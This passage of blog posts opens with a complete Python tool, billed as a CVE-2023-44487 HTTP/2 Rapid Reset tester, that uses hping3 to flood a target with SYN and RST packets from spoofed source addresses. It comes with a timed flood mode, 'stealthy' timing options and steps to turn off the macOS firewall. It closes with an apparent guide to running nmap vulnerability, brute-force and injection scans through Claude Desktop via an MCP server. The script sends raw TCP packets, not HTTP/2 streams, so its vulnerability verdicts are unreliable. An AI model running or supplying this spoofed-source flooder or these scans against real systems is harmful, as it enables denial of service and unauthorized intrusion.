                hping_cmd,
                '-S',  # SYN flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting SYN packet: {e}")
            return False

    def craft_rst_packet(self, source_ip: str, count: int = 1) -> bool:
        """
        Craft TCP RST packet using hping3

        Args:
            source_ip: Source IP address to spoof
            count: Number of packets to send

        Returns:
            True if successful, False otherwise
        """
        try:
            hping_cmd = self.get_hping_command()
            cmd = [
                hping_cmd,
                '-R',  # RST flag
                '-p', str(self.port),  # Destination port
                '-c', str(count),  # Packet count
                '--fast',  # Send packets as fast as possible
            ]

            if source_ip:
                cmd.extend(['-a', source_ip])  # Spoof source IP

            if self.interface:
                cmd.extend(['-I', self.interface])  # Specify network interface

            cmd.append(self.host)

            if self.verbose:
                print(f"Executing: {' '.join(cmd)}")

            result = subprocess.run(
                cmd,
                capture_output=True,
                text=True,
                timeout=self.timeout
            )

            return result.returncode == 0

        except subprocess.TimeoutExpired:
            if self.verbose:
                print(f"Timeout executing hping3 for {source_ip}")
            return False
        except Exception as e:
            if self.verbose:
                print(f"Error crafting RST packet: {e}")
            return False

    def rapid_reset_test(
        self,
        num_packets: int,
        packets_per_ip: int = 10,
        reset_ratio: float = 1.0,
        delay_between_bursts: float = 0.01
    ) -> dict:
        """
        Perform rapid reset attack simulation

        Args:
            num_packets: Total number of packets to send
            packets_per_ip: Number of packets per source IP before switching
            reset_ratio: Ratio of RST packets to SYN packets (1.0 = equal)
            delay_between_bursts: Delay between packet bursts in seconds

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None
        }

        print(f"\nStarting HTTP/2 Rapid Reset test:")
        print(f"   Total packets: {num_packets}")
        print(f"   Packets per source IP: {packets_per_ip}")
        print(f"   RST to SYN ratio: {reset_ratio}")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
            print(f"   Available source IPs: {len(self.source_ips)}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        used_ips = set()
        packets_sent = 0
        current_ip_packets = 0
        current_source_ip = self.get_random_source_ip()

        if current_source_ip:
            used_ips.add(current_source_ip)

        try:
            while packets_sent < num_packets:
                # Switch to new source IP if needed
                if current_ip_packets >= packets_per_ip and self.source_ips:
                    current_source_ip = self.get_random_source_ip()
                    used_ips.add(current_source_ip)
                    current_ip_packets = 0

                # Send SYN packet
                if self.craft_syn_packet(current_source_ip, count=1):
                    results['syn_packets'] += 1
                    results['total_packets'] += 1
                    packets_sent += 1
                    current_ip_packets += 1
                else:
                    results['failed_packets'] += 1

                # Send RST packet based on ratio
                if random.random() < reset_ratio:
                    if self.craft_rst_packet(current_source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                        packets_sent += 1
                        current_ip_packets += 1
                    else:
                        results['failed_packets'] += 1

                # Progress indicator
                if packets_sent % 100 == 0:
                    elapsed = time.time() - results['start_time']
                    rate = packets_sent / elapsed if elapsed > 0 else 0
                    print(f"Progress: {packets_sent}/{num_packets} packets "
                          f"({rate:.0f} pps) | "
                          f"Unique IPs: {len(used_ips)}")

                # Small delay between bursts
                if delay_between_bursts > 0:
                    time.sleep(delay_between_bursts)

        except KeyboardInterrupt:
            print("\nTest interrupted by user")
        except Exception as e:
            print(f"\nTest error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def flood_mode(
        self,
        duration: int = 60,
        packet_rate: int = 1000
    ) -> dict:
        """
        Perform continuous flood attack for specified duration

        Args:
            duration: Duration of the flood in seconds
            packet_rate: Target packet rate per second

        Returns:
            Dictionary with test results
        """
        results = {
            'total_packets': 0,
            'syn_packets': 0,
            'rst_packets': 0,
            'unique_source_ips': 0,
            'failed_packets': 0,
            'start_time': time.time(),
            'end_time': None,
            'duration': duration
        }

        print(f"\nStarting flood mode:")
        print(f"   Duration: {duration} seconds")
        print(f"   Target rate: {packet_rate} packets/second")
        print(f"   Target: {self.host}:{self.port}")
        if self.cidr_block:
            print(f"   Source CIDR: {self.cidr_block}")
        if self.interface:
            print(f"   Network interface: {self.interface}")
        print("=" * 60)

        end_time = time.time() + duration
        used_ips = set()

        try:
            while time.time() < end_time:
                batch_start = time.time()

                # Send batch of packets
                for _ in range(max(packet_rate // 20, 1)):  # each iteration sends a SYN and an RST, batched in 0.1s intervals
                    source_ip = self.get_random_source_ip()
                    if source_ip:
                        used_ips.add(source_ip)

                    # Send SYN
                    if self.craft_syn_packet(source_ip, count=1):
                        results['syn_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                    # Send RST
                    if self.craft_rst_packet(source_ip, count=1):
                        results['rst_packets'] += 1
                        results['total_packets'] += 1
                    else:
                        results['failed_packets'] += 1

                # Rate limiting
                batch_duration = time.time() - batch_start
                sleep_time = 0.1 - batch_duration
                if sleep_time > 0:
                    time.sleep(sleep_time)

                # Progress update
                elapsed = time.time() - results['start_time']
                remaining = end_time - time.time()
                rate = results['total_packets'] / elapsed if elapsed > 0 else 0

                print(f"Elapsed: {elapsed:.1f}s | Remaining: {remaining:.1f}s | "
                      f"Rate: {rate:.0f} pps | Total: {results['total_packets']}")

        except KeyboardInterrupt:
            print("\nFlood interrupted by user")
        except Exception as e:
            print(f"\nFlood error: {e}")

        results['end_time'] = time.time()
        results['unique_source_ips'] = len(used_ips)

        return results

    def display_results(self, results: dict):
        """Display test results in a readable format"""
        duration = results['end_time'] - results['start_time']

        print("\n" + "=" * 60)
        print("TEST RESULTS")
        print("=" * 60)
        print(f"Total packets sent:      {results['total_packets']}")
        print(f"SYN packets:             {results['syn_packets']}")
        print(f"RST packets:             {results['rst_packets']}")
        print(f"Failed packets:          {results['failed_packets']}")
        print(f"Unique source IPs used:  {results['unique_source_ips']}")
        print(f"Test duration:           {duration:.2f}s")

        if duration > 0:
            rate = results['total_packets'] / duration
            print(f"Average packet rate:     {rate:.0f} packets/second")

        print("\n" + "=" * 60)
        print("ASSESSMENT")
        print("=" * 60)

        if results['failed_packets'] > results['total_packets'] * 0.5:
            print("WARNING: High failure rate detected")
            print("  Check network connectivity and firewall rules")
        elif results['total_packets'] > 0:
            print("Test completed successfully")
            print("  Monitor target server for:")
            print("    Connection state table exhaustion")
            print("    CPU/memory utilization spikes")
            print("    Application performance degradation")

        print("=" * 60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description='Test web servers for HTTP/2 Rapid Reset vulnerability (macOS version)',
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
  # Basic test with CIDR block
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

  # Specify network interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

  # Flood mode for 60 seconds
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 10.0.0.0/16 --flood --duration 60

  # High intensity test with specific interface
  sudo python3 http2rapidresettester_macos.py --host example.com --cidr 172.16.0.0/12 --interface en1 --packets 10000 --packetsperip 50

  # Test without IP spoofing
  sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Prerequisites:
  1. Install hping3: brew install hping
  2. Run with sudo for raw socket access
  3. Check available interfaces: ifconfig

Note: hping3 gives consistent spoofing behavior across platforms, but upstream routers that implement egress filtering (BCP 38) may still drop spoofed packets.
        """
    )

    # Connection parameters
    parser.add_argument('--host', required=True, help='Target hostname or IP address')
    parser.add_argument('--port', type=int, default=443, help='Target port (default: 443)')
    parser.add_argument('--cidr', help='CIDR block for source IP spoofing (e.g., 192.168.1.0/24)')
    parser.add_argument('--interface', help='Network interface to use (e.g., en0, en1). Optional.')
    parser.add_argument('--timeout', type=int, default=30, help='Command timeout in seconds (default: 30)')

    # Test mode parameters
    parser.add_argument('--flood', action='store_true', help='Enable flood mode (continuous attack)')
    parser.add_argument('--duration', type=int, default=60, help='Duration for flood mode in seconds (default: 60)')
    parser.add_argument('--packetrate', type=int, default=1000, help='Target packet rate for flood mode (default: 1000)')

    # Normal mode parameters
    parser.add_argument('--packets', type=int, default=1000,
                       help='Total number of packets to send (default: 1000)')
    parser.add_argument('--packetsperip', type=int, default=10,
                       help='Number of packets per source IP before switching (default: 10)')
    parser.add_argument('--resetratio', type=float, default=1.0,
                       help='Ratio of RST to SYN packets (default: 1.0)')
    parser.add_argument('--burstdelay', type=float, default=0.01,
                       help='Delay between packet bursts in seconds (default: 0.01)')

    # Other options
    parser.add_argument('--verbose', action='store_true', help='Enable verbose output')

    args = parser.parse_args()

    # Print header
    print("=" * 60)
    print("HTTP/2 Rapid Reset Vulnerability Tester for macOS")
    print("CVE-2023-44487")
    print("Using hping3 for packet crafting")
    print("=" * 60)
    print(f"Target: {args.host}:{args.port}")
    if args.cidr:
        print(f"Source CIDR: {args.cidr}")
    else:
        print("Source IP: Local IP (no spoofing)")
    if args.interface:
        print(f"Interface: {args.interface}")
    print("=" * 60)

    # Create tester instance
    try:
        tester = HTTP2RapidResetTester(
            host=args.host,
            port=args.port,
            cidr_block=args.cidr,
            timeout=args.timeout,
            verbose=args.verbose,
            interface=args.interface
        )
    except RuntimeError as e:
        print(f"ERROR: {e}")
        sys.exit(1)

    try:
        if args.flood:
            # Run flood mode
            results = tester.flood_mode(
                duration=args.duration,
                packet_rate=args.packetrate
            )
        else:
            # Run normal rapid reset test
            results = tester.rapid_reset_test(
                num_packets=args.packets,
                packets_per_ip=args.packetsperip,
                reset_ratio=args.resetratio,
                delay_between_bursts=args.burstdelay
            )

        # Display results
        tester.display_results(results)

    except KeyboardInterrupt:
        print("\nTest interrupted by user")
        sys.exit(0)
    except Exception as e:
        print(f"\nFatal error: {e}")
        import traceback
        if args.verbose:
            traceback.print_exc()
        sys.exit(1)

if __name__ == '__main__':
    main()
EOF
chmod +x http2rapidresettester_macos.py

Using the Testing Script on macOS

Summary of usage:

# Use specific interface
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --interface en0 --packets 1000

# Use WiFi interface (typically en0 on MacBooks)
sudo python3 http2rapidresettester_macos.py --host example.com --interface en0 --packets 500

# Use Ethernet interface
sudo python3 http2rapidresettester_macos.py --host example.com --interface en1 --cidr 10.0.0.0/16 --flood --duration 30

# Without interface (uses default routing)
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

Test your server with CIDR block spoofing:

sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Advanced Examples

High intensity test (use cautiously in test environments):

sudo python3 http2rapidresettester_macos.py \
    --host staging.example.com \
    --cidr 10.0.0.0/16 \
    --packets 5000 \
    --packetsperip 50

Flood mode for sustained testing:

sudo python3 http2rapidresettester_macos.py \
    --host test.example.com \
    --cidr 172.16.0.0/12 \
    --flood \
    --duration 60 \
    --packetrate 500

Test without IP spoofing:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000

Verbose mode for debugging:

sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --cidr 192.168.1.0/24 \
    --packets 100 \
    --verbose

Gradual escalation test (start small, increase if needed):

# Start with 50 packets
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 50

# If server handles it well, increase
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 200

# Final aggressive test
sudo python3 http2rapidresettester_macos.py --host example.com --cidr 192.168.1.0/24 --packets 1000

Interpreting Results

The script outputs packet statistics including:

  • Total packets sent (SYN and RST combined)
  • Number of SYN packets
  • Number of RST packets
  • Failed packet count
  • Number of unique source IPs used
  • Average packet rate
  • Test duration
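
If you want to post-process these numbers instead of relying on the printed summary, the dict returned by rapid_reset_test() or flood_mode() can be inspected directly. A minimal sketch (assuming a tester instance created as in main()):

# Derive a failure rate and average packet rate from the results dict
results = tester.rapid_reset_test(num_packets=1000)

attempts = results['total_packets'] + results['failed_packets']
failure_rate = results['failed_packets'] / attempts if attempts else 0.0
duration = results['end_time'] - results['start_time']

print(f"Failure rate: {failure_rate:.1%}")
print(f"Average rate: {results['total_packets'] / duration:.0f} pps")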

What to Monitor

Monitor your target server for:

  • Connection state table exhaustion: Check netstat or ss output for connection counts
  • CPU and memory utilization spikes: Use Activity Monitor or top command
  • Application performance degradation: Monitor response times and error rates
  • Firewall or rate limiting triggers: Check firewall logs and rate limiting counters

Protected Server Indicators

  • High failure rate in the test results
  • Server actively blocking or rate limiting connections
  • Firewall rules triggering during test
  • Connection resets from the server

Vulnerable Server Indicators

  • All packets successfully sent with low failure rate
  • No rate limiting or blocking observed
  • Server continues processing all requests
  • Resource utilization climbs steadily

Why hping3 for macOS?

Using hping3 provides several advantages for macOS users:

Universal IP Spoofing Support

  • Consistent behavior: hping3 provides reliable IP spoofing across different network configurations
  • Proven tool: Industry standard for packet crafting and network testing
  • Better compatibility: Works with most network interfaces and routing configurations

macOS Specific Benefits

  • Native support: Works well with macOS network stack
  • Firewall compatibility: Better integration with macOS firewall
  • Performance: Efficient packet generation on macOS

Reliability Advantages

  • Mature codebase: hping3 has been battle tested for decades
  • Active community: Well documented with extensive community support
  • Cross platform: Same tool works on Linux, BSD, and macOS

macOS Installation and Setup

Installing hping3

# Using Homebrew (recommended)
brew install hping

# Verify installation
which hping3
hping3 --version

Firewall Configuration

macOS firewall may need configuration for raw packet injection:

  1. Open System Settings > Network > Firewall (System Preferences > Security & Privacy > Firewall on older macOS)
  2. Click “Options”
  3. Add Python to the list of allowed applications
  4. Grant network access when prompted

Alternatively, for testing environments:

# Temporarily disable firewall (not recommended for production)
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate off

# Re-enable after testing
sudo /usr/libexec/ApplicationFirewall/socketfilterfw --setglobalstate on

Network Interfaces

List available network interfaces:

ifconfig

Common macOS interfaces:

  • en0: Primary Ethernet/WiFi
  • en1: Secondary network interface
  • lo0: Loopback interface
  • bridge0: Bridged interface (if using virtualization)

Best Practices for Testing

  1. Start with staging/test environments: Never run aggressive tests against production without authorization
  2. Coordinate with your team: Inform security and operations teams before testing
  3. Monitor server metrics: Watch CPU, memory, and connection counts during tests
  4. Test during low traffic periods: Minimize impact on real users if testing production
  5. Gradual escalation: Start with conservative parameters and increase gradually
  6. Document results: Keep records of test results and any configuration changes
  7. Have rollback plans: Be prepared to quickly disable testing if issues arise

Troubleshooting on macOS

Error: “hping3 is not installed”

Install hping3 using Homebrew:

brew install hping

Error: “Operation not permitted”

Make sure you are running with sudo:

sudo python3 http2rapidresettester_macos.py [options]

Error: “No route to host”

Check your network connectivity:

ping example.com
traceroute example.com

Verify your network interface is up:

ifconfig en0

Packets Not Being Sent

Possible causes and solutions:

  1. Firewall blocking: Temporarily disable firewall or add exception
  2. Interface not active: Check ifconfig output
  3. Permission issues: Ensure running with sudo
  4. Wrong interface: Pass the correct interface via --interface (forwarded to hping3 as -I)

Low Packet Rate

Performance optimization tips:

  • Use wired Ethernet instead of WiFi
  • Close other network intensive applications
  • Reduce packet rate target with --packetrate
  • Use smaller CIDR blocks

Monitoring Your Tests

Using tcpdump

Monitor packets in real time:

# Watch SYN packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-syn != 0' -n

# Watch RST packets
sudo tcpdump -i en0 'tcp[tcpflags] & tcp-rst != 0' -n

# Watch specific host and port
sudo tcpdump -i en0 host example.com and port 443 -n

# Save to file for later analysis
sudo tcpdump -i en0 -w test_capture.pcap host example.com

Using Wireshark

For detailed packet analysis:

# Install Wireshark
brew install --cask wireshark

# Run Wireshark
sudo wireshark

# Or use tshark for command line
tshark -i en0 -f "host example.com"

Activity Monitor

Monitor system resources during testing:

  1. Open Activity Monitor (Applications > Utilities > Activity Monitor)
  2. Select “Network” tab
  3. Watch “Packets in” and “Packets out”
  4. Monitor “Data sent/received”
  5. Check CPU usage of Python process

Server Side Monitoring

On your target server, monitor:

# Connection states
netstat -an | grep :443 | awk '{print $6}' | sort | uniq -c

# Active connections count
netstat -an | grep ESTABLISHED | wc -l

# Half-open connections (SYN_RECV on Linux; SYN_RCVD on BSD/macOS)
netstat -an | egrep 'SYN_RECV|SYN_RCVD' | wc -l

# System resources
top -l 1 | head -10

Understanding IP Spoofing with hping3

How It Works

hping3 creates raw packets at the network layer, allowing you to specify arbitrary source IP addresses. This bypasses normal TCP/IP stack restrictions.
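
The testing script delegates this to hping3, but the same idea can be sketched in Python with the scapy library (illustration only, not part of the script; requires pip install scapy and root privileges, and the addresses are placeholders):

from scapy.all import IP, TCP, send

# Build a TCP SYN with a forged source address and send it at layer 3,
# bypassing the kernel's normal TCP stack
spoofed = IP(src="192.168.1.50", dst="example.com") / TCP(dport=443, flags="S")
send(spoofed, verbose=False)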

Network Requirements

For IP spoofing to work effectively:

  • Local networks: Works best on LANs you control
  • Direct routing: Requires direct layer 2 access
  • No NAT interference: NAT devices may rewrite source addresses
  • Router configuration: Some routers filter spoofed packets (BCP 38)

Testing Without Spoofing

If IP spoofing is not working in your environment:

# Test without CIDR block
sudo python3 http2rapidresettester_macos.py --host example.com --packets 1000

# This still validates:
# - Rate limiting configuration
# - Stream management
# - Server resilience
# - Resource consumption patterns

Advanced Configuration Options

Custom Packet Timing

# Slower, more stealthy testing
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 500 \
    --burstdelay 0.1  # 100ms between bursts

# Faster, more aggressive
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --burstdelay 0.001  # 1ms between bursts

Custom RST to SYN Ratio

# More SYN packets (mimics connection attempts)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 0.3  # 1 RST for every 3 SYN

# Equal SYN and RST (classic rapid reset)
sudo python3 http2rapidresettester_macos.py \
    --host example.com \
    --packets 1000 \
    --resetratio 1.0

Targeting Different Ports

# Test HTTPS (port 443)
sudo python3 http2rapidresettester_macos.py --host example.com --port 443

# Test HTTP/2 on custom port
sudo python3 http2rapidresettester_macos.py --host example.com --port 8443

# Test load balancer
sudo python3 http2rapidresettester_macos.py --host lb.example.com --port 443

Understanding the Attack Surface

When testing your infrastructure:

  1. Test all HTTP/2 endpoints: Web servers, load balancers, API gateways
  2. Verify CDN protection: Test both origin and CDN endpoints
  3. Test direct vs proxied: Compare protection at different layers
  4. Validate rate limiting: Ensure limits trigger at expected thresholds
  5. Confirm monitoring: Verify alerts trigger correctly

Conclusion

The HTTP/2 Rapid Reset vulnerability represents a significant threat to web infrastructure, but with proper patching, configuration, and monitoring, you can effectively protect your systems. This macOS optimized testing script using hping3 allows you to validate your defenses in a controlled manner with reliable IP spoofing capabilities across different network environments.

Remember that security is an ongoing process. Regularly:

  • Update your web server and proxy software
  • Review and adjust HTTP/2 configuration limits
  • Monitor for unusual traffic patterns
  • Test your defenses against emerging threats

By staying vigilant and proactive, you can maintain a resilient web presence capable of withstanding sophisticated DDoS attacks.

This blog post and testing script are provided for educational and defensive security purposes only. Always obtain proper authorization before testing systems you do not own.


macOS: Deep Dive into NMAP using Claude Desktop with an NMAP MCP

Introduction

NMAP (Network Mapper) is one of the most powerful and versatile network scanning tools available for security professionals, system administrators, and ethical hackers. When combined with Claude through the Model Context Protocol (MCP), it becomes an even more powerful tool, allowing you to leverage AI to intelligently analyze scan results, suggest scanning strategies, and interpret complex network data.

In this deep dive, we’ll explore how to set up NMAP with Claude Desktop using an MCP server, and demonstrate 20+ comprehensive vulnerability checks and reconnaissance techniques you can perform using natural language prompts.

Legal Disclaimer: Only scan systems and networks you own or have explicit written permission to test. Unauthorized scanning may be illegal in your jurisdiction.

Prerequisites

  • macOS, Linux, or Windows with WSL
  • Basic understanding of networking concepts
  • Permission to scan target systems
  • Claude Desktop installed

Part 1: Installation and Setup

Step 1: Install NMAP

On macOS:

# Using Homebrew
brew install nmap

# Verify installation
nmap --version

On Linux (Ubuntu/Debian):

sudo apt update && sudo apt install -y nmap

Step 2: Install Node.js (Required for MCP Server)

The NMAP MCP server requires Node.js to run.

On macOS:

brew install node
node --version
npm --version

Step 3: Install the NMAP MCP Server

A popular NMAP MCP server is available on GitHub. We’ll clone and build it from source:

cd ~/
rm -rf nmap-mcp-server
git clone https://github.com/PhialsBasement/nmap-mcp-server.git
cd nmap-mcp-server
npm install
npm run build

Step 4: Configure Claude Desktop

Edit the Claude Desktop configuration file to add the NMAP MCP server.

On macOS:

CONFIG_FILE="$HOME/Library/Application Support/Claude/claude_desktop_config.json"
USERNAME=$(whoami)

cp "$CONFIG_FILE" "$CONFIG_FILE.backup"

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser("~/Library/Application Support/Claude/claude_desktop_config.json")
username = os.environ['USER']

with open(config_file, 'r') as f:
    config = json.load(f)

if 'mcpServers' not in config:
    config['mcpServers'] = {}

config['mcpServers']['nmap'] = {
    "command": "node",
    "args": [
        f"/Users/{username}/nmap-mcp-server/dist/index.js"
    ],
    "env": {}
}

with open(config_file, 'w') as f:
    json.dump(config, f, indent=2)

print("nmap server added to Claude Desktop config!")
print(f"Backup saved to: {config_file}.backup")
EOF

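Before restarting Claude Desktop, you can optionally confirm the entry was written. A minimal check (same default macOS config path as above):

python3 << 'EOF'
import json
import os

config_file = os.path.expanduser(
    "~/Library/Application Support/Claude/claude_desktop_config.json")
with open(config_file) as f:
    config = json.load(f)

# 'nmap' should appear among the registered MCP servers
print("MCP servers:", ", ".join(config.get("mcpServers", {})))
EOF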

Step 5: Restart Claude Desktop

Close and reopen Claude Desktop. You should see the NMAP MCP server connected in the bottom-left corner.

Part 2: Understanding NMAP MCP Capabilities

Once configured, Claude can execute NMAP scans through the MCP server. The server typically provides:

  • Host discovery scans
  • Port scanning (TCP/UDP)
  • Service version detection
  • OS detection
  • Script scanning (NSE – NMAP Scripting Engine)
  • Output parsing and interpretation

Part 3: 20 Most Common Vulnerability Checks

For these examples, we’ll use a hypothetical target domain: example-target.com (replace with your authorized target).

1. Basic Host Discovery and Open Ports

Prompt:

Scan example-target.com to discover if the host is up and identify all open ports (1-1000). Use a TCP SYN scan for speed.

What this does: Performs a fast SYN scan on the first 1000 ports to quickly identify open services.

Expected NMAP command:

nmap -sS -p 1-1000 example-target.com

2. Comprehensive Port Scan (All 65535 Ports)

Prompt:

Perform a comprehensive scan of all 65535 TCP ports on example-target.com to identify any services running on non-standard ports.

What this does: Scans every possible TCP port – time-consuming but thorough.

Expected NMAP command:

nmap -p- example-target.com

3. Service Version Detection

Prompt:

Scan the top 1000 ports on example-target.com and detect the exact versions of services running on open ports. This will help identify outdated software.

What this does: Probes open ports to determine service/version info, crucial for finding known vulnerabilities.

Expected NMAP command:

nmap -sV example-target.com

4. Operating System Detection

Prompt:

Detect the operating system running on example-target.com using TCP/IP stack fingerprinting. Include OS detection confidence levels.

What this does: Analyzes network responses to guess the target OS.

Expected NMAP command:

nmap -O example-target.com

5. Aggressive Scan (OS + Version + Scripts + Traceroute)

Prompt:

Run an aggressive scan on example-target.com that includes OS detection, version detection, script scanning, and traceroute. This is comprehensive but noisy.

What this does: Combines multiple detection techniques for maximum information.

Expected NMAP command:

nmap -A example-target.com

6. Vulnerability Scanning with NSE Scripts

Prompt:

Scan example-target.com using NMAP's vulnerability detection scripts to check for known CVEs and security issues in running services.

What this does: Uses NSE scripts from the ‘vuln’ category to detect known vulnerabilities.

Expected NMAP command:

nmap --script vuln example-target.com

7. SSL/TLS Security Analysis

Prompt:

Analyze SSL/TLS configuration on example-target.com (port 443). Check for weak ciphers, certificate issues, and SSL vulnerabilities like Heartbleed and POODLE.

What this does: Comprehensive SSL/TLS security assessment.

Expected NMAP command:

nmap -p 443 --script ssl-enum-ciphers,ssl-cert,ssl-heartbleed,ssl-poodle example-target.com

8. HTTP Security Headers and Vulnerabilities

Prompt:

Check example-target.com's web server (ports 80, 443, 8080) for security headers, common web vulnerabilities, and HTTP methods allowed.

What this does: Tests for missing security headers, dangerous HTTP methods, and common web flaws.

Expected NMAP command:

nmap -p 80,443,8080 --script http-security-headers,http-methods,http-csrf,http-stored-xss example-target.com

9. SMB Vulnerability Scanning (EternalBlue)

Prompt:

Scan example-target.com for SMB vulnerabilities including MS17-010 (EternalBlue), SMB signing issues, and accessible shares.

What this does: Critical for identifying Windows systems vulnerable to ransomware exploits.

Expected NMAP command:

nmap -p 445 --script smb-vuln-ms17-010,smb-vuln-*,smb-enum-shares example-target.com

10. SQL Injection Testing

Prompt:

Test web applications on example-target.com (ports 80, 443) for SQL injection vulnerabilities in common web paths and parameters.

What this does: Identifies potential SQL injection points.

Expected NMAP command:

nmap -p 80,443 --script http-sql-injection example-target.com

11. DNS Zone Transfer Vulnerability

Prompt:

Test if example-target.com's DNS servers allow unauthorized zone transfers, which could leak internal network information.

What this does: Attempts AXFR zone transfer – a serious misconfiguration if allowed.

Expected NMAP command:

nmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=example-target.com -p 53 example-target.com

12. SSH Security Assessment

Prompt:

Analyze SSH configuration on example-target.com (port 22). Check for weak encryption algorithms, host keys, and authentication methods.

What this does: Identifies insecure SSH configurations.

Expected NMAP command:

nmap -p 22 --script ssh-auth-methods,ssh-hostkey,ssh2-enum-algos example-target.com

13. FTP Anonymous Access and Vulnerabilities

Prompt:

Check if example-target.com's FTP server (port 21) allows anonymous login and scan for FTP-related vulnerabilities.

What this does: Tests for anonymous FTP access and common FTP security issues.

Expected NMAP command:

nmap -p 21 --script ftp-anon,ftp-vuln-cve2010-4221,ftp-bounce example-target.com

14. Email Server Security Assessment

Prompt:

Scan example-target.com's email servers (ports 25, 110, 143, 587, 993, 995) for open relays, STARTTLS support, and vulnerabilities.

What this does: Comprehensive email server security check.

Expected NMAP command:

nmap -p 25,110,143,587,993,995 --script smtp-open-relay,smtp-enum-users,ssl-cert example-target.com

15. Database Server Exposure

Prompt:

Check if example-target.com has publicly accessible database servers (MySQL, PostgreSQL, MongoDB, Redis) and test for default credentials.

What this does: Identifies exposed databases, a critical security issue.

Expected NMAP command:

nmap -p 3306,5432,27017,6379 --script mysql-empty-password,pgsql-brute,mongodb-databases,redis-info example-target.com

16. WordPress Security Scan

Prompt:

If example-target.com runs WordPress, enumerate plugins, themes, and users, and check for known vulnerabilities.

What this does: WordPress-specific security assessment.

Expected NMAP command:

nmap -p 80,443 --script http-wordpress-enum,http-wordpress-users example-target.com

17. XML External Entity (XXE) Vulnerability

Prompt:

Test web services on example-target.com for XML External Entity (XXE) injection vulnerabilities.

What this does: NMAP ships no dedicated XXE script; the closest stock check targets the related Apache Struts flaw (CVE-2017-5638), so treat this as a starting point and follow up with manual XXE probes.

Expected NMAP command:

nmap -p 80,443 --script http-vuln-cve2017-5638 example-target.com

18. SNMP Information Disclosure

Prompt:

Scan example-target.com for SNMP services (UDP port 161) and attempt to extract system information using common community strings.

What this does: SNMP can leak sensitive system information.

Expected NMAP command:

nmap -sU -p 161 --script snmp-brute,snmp-info example-target.com

19. RDP Security Assessment

Prompt:

Check if Remote Desktop Protocol (RDP) on example-target.com (port 3389) is vulnerable to known exploits like BlueKeep (CVE-2019-0708).

What this does: Critical Windows remote access check. Note that the stock NSE script covers MS12-020; BlueKeep (CVE-2019-0708) detection requires a third-party script.

Expected NMAP command:

nmap -p 3389 --script rdp-vuln-ms12-020,rdp-enum-encryption example-target.com

20. API Endpoint Discovery and Testing

Prompt:

Discover API endpoints on example-target.com and test for common API vulnerabilities including authentication bypass and information disclosure.

What this does: Identifies REST APIs and tests for common API security issues.

Expected NMAP command:

nmap -p 80,443,8080,8443 --script http-methods,http-auth-finder,http-devframework example-target.com

Part 4: Deep Dive Exercises

Deep Dive Exercise 1: Complete Web Application Security Assessment

Scenario: You need to perform a comprehensive security assessment of a web application running at webapp.example-target.com.

Claude Prompt:

I need a complete security assessment of webapp.example-target.com. Please:

1. First, discover all open ports and running services
2. Identify the web server software and version
3. Check for SSL/TLS vulnerabilities and certificate issues
4. Test for common web vulnerabilities (XSS, SQLi, CSRF)
5. Check security headers (CSP, HSTS, X-Frame-Options, etc.)
6. Enumerate web directories and interesting files
7. Test for backup file exposure (.bak, .old, .zip)
8. Check for sensitive information in robots.txt and sitemap.xml
9. Test HTTP methods for dangerous verbs (PUT, DELETE, TRACE)
10. Provide a prioritized summary of findings with remediation advice

Use timing template T3 (normal) to avoid overwhelming the target.

What Claude will do:

Claude will execute multiple NMAP scans in sequence, starting with discovery and progressively getting more detailed. Example commands it might run:

# Phase 1: Discovery
nmap -sV -T3 webapp.example-target.com

# Phase 2: SSL/TLS Analysis
nmap -p 443 -T3 --script ssl-cert,ssl-enum-ciphers,ssl-known-key,ssl-heartbleed,ssl-poodle,ssl-ccs-injection webapp.example-target.com

# Phase 3: Web Vulnerability Scanning
nmap -p 80,443 -T3 --script http-security-headers,http-csrf,http-sql-injection,http-stored-xss,http-dombased-xss webapp.example-target.com

# Phase 4: Directory and File Enumeration
nmap -p 80,443 -T3 --script http-enum,http-backup-finder webapp.example-target.com

# Phase 5: HTTP Methods Testing
nmap -p 80,443 -T3 --script http-methods --script-args http-methods.test-all webapp.example-target.com

Learning Outcomes:

  • Understanding layered security assessment methodology
